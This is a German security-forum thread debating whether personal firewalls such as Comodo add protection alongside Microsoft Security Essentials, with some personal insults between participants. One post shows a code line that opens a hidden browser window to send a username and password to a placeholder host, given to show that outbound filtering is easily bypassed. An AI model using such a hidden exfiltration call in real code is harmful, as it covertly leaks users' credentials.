Zurück   Trojaner-Board > Malware entfernen > Antiviren-, Firewall- und andere Schutzprogramme

Antiviren-, Firewall- und andere Schutzprogramme: MSE + Comodo firewall?

Windows 7 Sämtliche Fragen zur Bedienung von Firewalls, Anti-Viren Programmen, Anti Malware und Anti Trojaner Software sind hier richtig. Dies ist ein Diskussionsforum für Sicherheitslösungen für Windows Rechner. Benötigst du Hilfe beim Trojaner entfernen oder weil du dir einen Virus eingefangen hast, erstelle ein Thema in den oberen Bereinigungsforen.

Antwort
Alt 10.10.2010, 00:03   #31
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Zitat:
xD ich hau mich weg... was? es macht keinen Sinn? Weil du das sagst?
Deine Lügen und primitiven ellenlangen Text nerven. Außerdem wirst Du beleidigend.
Erkläre einfach bitte was an einer Subnetzmaske ein Protokoll sein soll, den Rest kannst Du Dir sparen.

BTW: Wir haben hier eine Zitatfunktion. Würde die Übersichtlichkeit Deiner Beiträge enorm steigern, aber Du hast anscheinend eh kein Interesse daran, dass jmd Deine Beiträge vollständig und ernst liest.
__________________
Logfiles bitte immer in CODE-Tags posten

Geändert von cosinus (10.10.2010 um 00:13 Uhr)

Alt 11.10.2010, 04:18   #32
Da GuRu
Administrator
/// technical service
 

MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Zitat:
Du bist mit abstand wirklich der größte Depp der mir je untergekommen ist.
Zitat:
Ist echt interessant wie du dich hier lustig machst über Dinge die ich weder gesagt habe noch nicht gesagt habe ,was für ein Knallkopf
sind das hier deine stärksten 'argumente'?

damit hast du dich selbst endgültig disqualifiziert...

du kannst ja gut und gerne an die 'kraft der blinkenden desktop-diskos' glauben (wir haben ja religionsfreiheit ) aber leider wirst du mit deinen beleidigungen genau nur bis hier hin kommen!

Zitat:
Beiträge: 19.717 ,du musst ja wirklich ein wahnsinniges Bedürfnis verspühren rund um die Uhr hier zu verweilen um auf diese Masse zu kommen. Ich hingegen ziehe das wahre Leben deutlich einer Inet Existenz vor...
tja, da siehst du mal was der unterschied zwischen glauben und wissen ist

schon mal daran gedacht, dass manche sich mit dem thema professionell beschäftigen und nicht nur um auf dem schulhof prahlen zu können?

... ajajaj ... jetzt hat cosinus anspruch auf eine 'sonderzulage für außerordentliche härtefälle' ... in seinem honorar-vertrag steht:
IF IQ($user) < IQ('Fischbrötchen') THEN Zulage('WTF')
__________________


Alt 23.10.2010, 18:34   #33
XXThekiller1
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Zitat:
MSSE ist ok,dem stimme ich zu!!!
Aber auß eigener ehrfahrung kann ich nur sagen das man eigentlich keine Personal-Firewall Software braucht,die hauseigene Windows Firewall(vor allem bei Windows 7)reicht volkommen aus.
PSAußer vielleicht du hastßn paar Server auf deinem System laufen dann kann das nützlich sehn,weisste wegen erhöhtem datenverkehr)
__________________

Alt 23.10.2010, 19:10   #34
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Zitat:
Außer vielleicht du hastßn paar Server auf deinem System laufen dann kann das nützlich sehn,weisste wegen erhöhtem datenverkehr)
Inwiefern ist die PFW da genau nützlicher? Nur weil man erhöhten Datenverkehr hat?
Nichtsdestotrotz muss für den Server, zB ein FTP-Server, eine Regel erstellt werden, eine Regel die den FTP-Server erreichbar macht.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 24.10.2010, 02:30   #35
Lauser71
Gesperrt
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Hallo XXThekiller1,
wenn ich ein "paar" Server auf dem System habe, was soll mir da eine PFW bringen? 0.00
Wenn ich Server bertreibe gehört eine echte Firewall (Konzept) und keine PFW dazu.


Alt 05.11.2010, 20:15   #36
XXThekiller1
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



klar muss ma bei windows 7 und andere ne regel ertellen,aber ne pfw is besser weil du die auf spezielle teile von software ansetzten kannst(damit mein ich du kannst bei ner guten firewall auch sehen welches programm welchen netzwerkzugriff hat und das kontrollieren)
Zitat:
Wenn man sich aber gut auskennt dann gibts dazu ja auch Task-Manager nich war???

Alt 05.11.2010, 20:16   #37
XXThekiller1
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Und noch kleine Notiz,hatte mal Online-Armor,habs aber nich mehr runtergekriegt,deswegen bin ich bisschen misstrauisch gegenüber PFW´s

Alt 06.11.2010, 15:24   #38
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Zitat:
(damit mein ich du kannst bei ner guten firewall auch sehen welches programm welchen netzwerkzugriff hat und das kontrollieren)
Das ist eine tolle Legende. Du kannst nur die Programme kontrollieren, die sich auch netterweise kontrollieren lassen. Ausgehenden Traffic kannt Du nicht zuverlässig kontrollieren/blocken.

Nun, SO einfach ist es, die PFW zu umgehen:

Code:
ATTFilter
ShellExecute(NULL, "open", "http://www.poehseseite.com/?var1=$username&var2=$password", NULL, NULL, SW_HIDE);
         
Damit ruft der default Browser in einem unsichtbaren Fenster eine URL mit sensiblen Daten auf.

Use ShellExecute to launch the default Web browser
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 15.11.2010, 05:18   #39
Lauser71
Gesperrt
 
MSE + Comodo firewall? - Standard

MSE + Comodo firewall?



Zitat:
Zitat von XXThekiller1 Beitrag anzeigen
aber ne pfw is besser weil du die auf spezielle teile von software ansetzten kannst(damit mein ich du kannst bei ner guten firewall auch sehen welches programm welchen netzwerkzugriff hat und das kontrollieren)
Hallo XXThekiller1,
auf einem Server brauch ich keine Pfw da dort nichts weiter laufen sollte als der oder die Server und ich somit auch keine Programme kontrollieren muß.
Pfw sind meiner Meinung nach für die Mülltonne, da sie umgangen werden können und nur eine trügerische Sicherheit bieten. Von einer Programmkontrolle ganz zu schweigen. Hierzu gibt es ausführliche Tests von kompetenten Stellen im Internet.

Antwort

Themen zu MSE + Comodo firewall?
avira, comodo, ebenfalls, einfach, erkennen, firewall, forum, gleichzeitig, gratis, internet, jahre, kaspersky, kis, kostenlos, lizenz, neu, neuer, online armor, ressourcen, schädlinge, security, suite, system, version, version., win, win7




Ähnliche Themen: MSE + Comodo firewall?


  1. Comodo wird TrojWare.JS.Agent.PD@300743807 nicht los
    Log-Analyse und Auswertung - 06.07.2015 (18)
  2. Wie Comodo Firewall deinstallieren?
    Antiviren-, Firewall- und andere Schutzprogramme - 20.01.2015 (44)
  3. Comodo will pdf24-creator-6.1.2 nicht installieren
    Antiviren-, Firewall- und andere Schutzprogramme - 14.01.2015 (3)
  4. Comodo KillSwitch mysteriöser Upload
    Antiviren-, Firewall- und andere Schutzprogramme - 09.11.2014 (4)
  5. Comodo Firewall +Bitdefender internet oder Bitdefender antivir ?
    Antiviren-, Firewall- und andere Schutzprogramme - 22.08.2014 (6)
  6. bitdefender oder Comodo Firwall ? welche ist die bessere
    Antiviren-, Firewall- und andere Schutzprogramme - 22.08.2014 (17)
  7. Comodo Security Antivirus Free
    Smartphone, Tablet & Handy Security - 10.10.2013 (0)
  8. Beim starten von dds.com und dds.scr findet comodo .heur.suspicious@1
    Plagegeister aller Art und deren Bekämpfung - 09.04.2012 (3)
  9. Comodo Antivirus mit Windows Firewall ?
    Antiviren-, Firewall- und andere Schutzprogramme - 03.01.2012 (14)
  10. Comodo Firewall und Avira Probleme
    Plagegeister aller Art und deren Bekämpfung - 24.12.2011 (5)
  11. Comodo Firewall - Netzwerk einstellung
    Netzwerk und Hardware - 30.10.2011 (1)
  12. Comodo Firewall startet nicht ? (virus eventuell?)
    Log-Analyse und Auswertung - 13.07.2011 (2)
  13. Comodo Firewall nichtmehr startbar und rechner laggt öfters ( TDSS) ?
    Plagegeister aller Art und deren Bekämpfung - 12.07.2011 (3)
  14. Comodo Internet Security deinstallieren...
    Antiviren-, Firewall- und andere Schutzprogramme - 11.06.2011 (2)
  15. Erneut Comodo-SSL-Registrar gehackt
    Nachrichten - 25.05.2011 (0)
  16. Taugt die Comodo Internet Security was?
    Antiviren-, Firewall- und andere Schutzprogramme - 05.04.2010 (1)
  17. Comodo 2.4 Pro
    Antiviren-, Firewall- und andere Schutzprogramme - 22.01.2007 (1)

Zum Thema MSE + Comodo firewall? - Zitat: xD ich hau mich weg... was? es macht keinen Sinn? Weil du das sagst? Deine Lügen und primitiven ellenlangen Text nerven. Außerdem wirst Du beleidigend. Erkläre einfach bitte was - MSE + Comodo firewall?...
Archiv
Du betrachtest: MSE + Comodo firewall? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.